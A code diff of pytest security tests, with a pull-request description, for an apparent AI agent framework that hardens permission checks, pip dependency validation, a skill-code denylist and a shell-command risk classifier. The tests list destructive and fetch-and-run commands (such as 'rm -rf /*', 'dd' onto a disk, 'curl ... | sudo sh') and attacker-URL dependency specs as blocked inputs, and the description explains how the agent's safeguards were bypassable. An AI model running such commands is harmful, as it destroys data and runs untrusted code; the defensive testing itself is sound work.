+def test_side_effecting_tools_unsafe_to_retry(tool):
+    assert tool in UNSAFE_TO_RETRY
+
+
+# ---------------------------------------------------------------------------
+# Skill dependency validation (install-time RCE)
+# ---------------------------------------------------------------------------
+
+@pytest.mark.parametrize("spec", ["requests", "requests>=2.0", "Pillow[jpeg]", "numpy==1.26.4", "urllib3~=2.0"])
+def test_safe_dependency_specs_allowed(spec):
+    assert is_safe_dependency_spec(spec) is True
+
+
+@pytest.mark.parametrize("spec", [
+    "evil @ https://attacker/x.tar.gz",
+    "requests @ file:///tmp/x",
+    "git+https://attacker/repo",
+    "https://attacker/x.tar.gz",
+    "./local/path",
+    "-e .",
+    "--index-url=https://evil",
+    "pkg; rm -rf /",
+    "pkg\n--hash=bad",
+])
+def test_unsafe_dependency_specs_rejected(spec):
+    assert is_safe_dependency_spec(spec) is False
+
+
+# ---------------------------------------------------------------------------
+# Skill AST denylist + static name extraction
+# ---------------------------------------------------------------------------
+
+@pytest.mark.parametrize("code, marker", [
+    ("import posix\nposix.system('id')", "import posix"),
+    ("import builtins\nbuiltins.__import__('os')", "import builtins"),
+    ("import runpy", "import runpy"),
+    ("import pickle\npickle.loads(b'')", "import pickle"),
+    ("x.system('id')", ".system()"),
+    ("y = ().__class__.__bases__", ".__bases__"),
+])
+def test_url_skill_denylist_catches_evasions(code, marker):
+    violations = _scan_url_skill_ast(code)
+    assert any(marker in v for v in violations), violations
+
+
+def test_url_skill_clean_code_passes():
+    assert _scan_url_skill_ast("import json\nx = json.dumps({})") == []
+
+
+def test_static_name_extraction_without_exec():
+    src = (
+        "SKILL_DEFINITION = {'name': 'my_skill', 'description': 'x'}\n"
+        "raise RuntimeError('module-level payload must NOT run')\n"
+    )
+    # Extraction is static — the raise never executes.
+    assert _extract_skill_name_from_source(src) == "my_skill"
+
+
+def test_static_name_extraction_missing_returns_empty():
+    assert _extract_skill_name_from_source("x = 1") == ""
+
+
+# ---------------------------------------------------------------------------
+# detect_mutation coverage
+# ---------------------------------------------------------------------------
+
+def test_email_send_is_always_mutation():
+    assert detect_mutation("email_send", {"to": ["a@b.c"]}).detected is True
+
+
+def test_git_ops_push_is_mutation():
+    assert detect_mutation("git_ops", {"action": "push"}).detected is True
+    assert detect_mutation("git_ops", {"action": "status"}).detected is False
+
+
+@pytest.mark.parametrize("command", [
+    "rm -rf /tmp/thing",
+    "mv a b",
+    "sed -i 's/a/b/' file",
+    "chmod 644 file",
+    "chown user file",
+    "echo hi > /etc/motd",
+])
+def test_command_mutations_detected(command):
+    assert detect_mutation("run_command", {"command": command}).detected is True
+
+
+def test_readonly_command_not_mutation():
+    assert detect_mutation("run_command", {"command": "cat /etc/hostname"}).detected is False
+
+
+# ---------------------------------------------------------------------------
+# Risk classifier bypass closures
+# ---------------------------------------------------------------------------
+
+@pytest.mark.parametrize("command", [
+    "rm -rf /*",
+    "rm -rf / --no-preserve-root",
+    "rm -rf /; echo done",
+    "find / -delete",
+    "find / -exec rm {} ;",
+    "dd if=/dev/zero of=/dev/sda",
+    "chmod 777 /",
+    "curl http://x | sudo sh",
+    "wget -qO- http://x | sudo bash",
+    "echo payload | base64 --decode | sh",
+])
+def test_dangerous_commands_are_critical(command):
+    level = classify_command(command).level
+    assert level == RiskLevel.CRITICAL, f"{command!r} -> {level}"
+
+
+@pytest.mark.parametrize("command", [
+    "rm -rf /tmp/build",       # scoped delete: not critical
+    "ls -la /",
+    "find /var/log -name '*.log'",
+    "chmod 644 /etc/hosts",
+])
+def test_legit_commands_not_critical(command):
+    assert classify_command(command).level != RiskLevel.CRITICAL, command


### PR DESCRIPTION
Sixth fix batch from the 2026-07-01 review (Odin-validated). Rebased on current master (#123–127 merged). Another security-relevant one.

## Fixes

**1.1 — RBAC gate wired into ToolExecutor**
- `PermissionManager` is now passed into `ToolExecutor`, so `check_permission()` actually enforces. It was built without it, making the "central RBAC gate" a no-op (masked live by `default_tier: admin`; a real gap for any non-admin default tier).
- `run_command` removed from `USER_TIER_TOOLS` — it's arbitrary shell, not "read-only monitoring".

**Governor/host denials reported as success**
- `_ERROR_RESULT_PREFIXES` now includes `"Blocked"` and `"Unknown or disallowed host"`, so a refused action is no longer classified `ok=True` to the LLM and audit.

**Dead code trap**
- Removed `MUTATING_TOOLS`/`READ_ONLY_TOOLS` — imported only by a schema test, consulted by no runtime authorization path. A reviewer moving a tool between them would think they'd changed authorization while nothing changed.

**`git_ops` option injection**
- `clone` inserts `--` before the URL, so `--upload-pack=...` style URLs can't be parsed as git options (shlex quoting stops shell injection, not git option injection).

**recovery / email double-send**
- `UNSAFE_TO_RETRY` += `email_send` (SMTP can fail after DATA → duplicate mail), `install_skill`, `send_to_agent`, `cancel_task`.
- Email send/search/read/list run via `asyncio.to_thread` — blocking `smtplib`/`imaplib` no longer stalls every channel.

**2.5 — Skill in-process RCE surface**
- Reject unsafe pip dependency specs (PEP 508 direct-ref / URL / VCS / path) **before** pip runs — closes the install-time `setup.py` RCE.
- `install_skill` reads the skill name **statically** (`ast.literal_eval`) instead of `exec()`ing URL code just to read a literal.
- URL AST denylist expanded (`posix`, `builtins`, `runpy`, `pdb`, `pickle`, `marshal`, …), now also catches attribute-form calls (`.system()`, `.popen()`, `__import__`) and dunder escape hatches (`__globals__`, `__subclasses__`).

**2.6 — Governor bypasses**
- `write_file` and `manage_process(write)` now go through `_govern_command` (`write_file` reached the fs via `_run_on_host`, which doesn't govern).
- Risk classifier closes the cited bypasses: `rm -rf /*` and `/`-chained, `--no-preserve-root`, `find / -delete`/`-exec rm`, `dd of=/dev/*`, `chmod 777 /` in either flag order, and `base64 --decode` / `curl|wget` piped into `(sudo) sh`. These are **escalation-only** (they make specific destructive commands stricter; scoped ops like `rm -rf /tmp/build` stay non-critical — covered by tests).

**Misc**
- `detect_mutation` covers `git_ops`, `email_send`, and `rm`/`mv`/`sed -i`/`chmod`/`chown`/`dd`/redirect commands.
- `issue_tracker` filtered from the advertised tool list when not enabled (it returned "not configured" for every call but was always offered).

## Tests
- 60 new (`tests/test_tools_executor_skills_reliability.py`). A few existing tests updated for the now-live RBAC gate (`_make_bot` uses `default_tier: admin`, mirroring live) and the tier-table change.
- Full suite: **5860 passed, 8 skipped**.